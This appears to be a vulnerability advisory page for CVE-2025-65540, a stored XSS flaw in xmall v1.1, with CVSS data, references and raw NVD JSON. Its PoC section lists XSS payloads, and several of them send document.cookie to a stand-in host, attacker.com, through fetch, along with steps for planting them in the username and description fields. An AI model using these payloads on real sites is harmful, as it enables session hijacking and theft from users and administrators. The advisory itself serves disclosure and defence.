CVE-2025-65540

Description

Multiple Cross-Site Scripting (XSS) vulnerabilities exist in xmall v1.1 due to improper handling of user-supplied data. User input fields such as username and description are directly rendered into HTML without proper sanitization or encoding, allowing attackers to inject and execute malicious scripts.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:exrick:xmall:1.1:*:*:*:*:*:*:* - VULNERABLE

xmall v1.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- Stored XSS PoC for CVE-2025-65540 -->
<!-- Method 1: Script tag injection -->
<script>alert('XSS');console.log(document.cookie);</script>

<!-- Method 2: Event handler injection -->
<img src=x onerror="fetch('https://attacker.com/steal?c='+document.cookie)">

<!-- Method 3: SVG injection -->
<svg/onload=fetch('https://attacker.com/steal?c='+btoa(document.cookie))>

<!-- Method 4: Body onload injection -->
<body onload="fetch('https://attacker.com/steal?c='+document.cookie)">

<!-- Exploitation scenario -->
<!-- 1. Register new account with malicious username -->
<!-- 2. Submit product with malicious description -->
<!-- 3. Wait for admin/user to view affected page -->
<!-- 4. Malicious JS executes in victim's browser context -->

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-65540
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-65540
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-65540/
[4] VulDB https://vuldb.com/cve/CVE-2025-65540
[5] https://github.com/Exrick/xmall/issues/101

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-65540", "sourceIdentifier": "[email protected]", "published": "2025-11-29T04:15:56.417", "lastModified": "2025-12-23T16:05:35.050", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Multiple Cross-Site Scripting (XSS) vulnerabilities exist in xmall v1.1 due to improper handling of user-supplied data. User input fields such as username and description are directly rendered into HTML without proper sanitization or encoding, allowing attackers to inject and execute malicious scripts."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:exrick:xmall:1.1:*:*:*:*:*:*:*", "matchCriteriaId": "E46154B1-2E17-432C-839B-1F13469BCA05"}]}]}], "references": [{"url": "https://github.com/Exrick/xmall/issues/101", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "Issue Tracking"]}]}}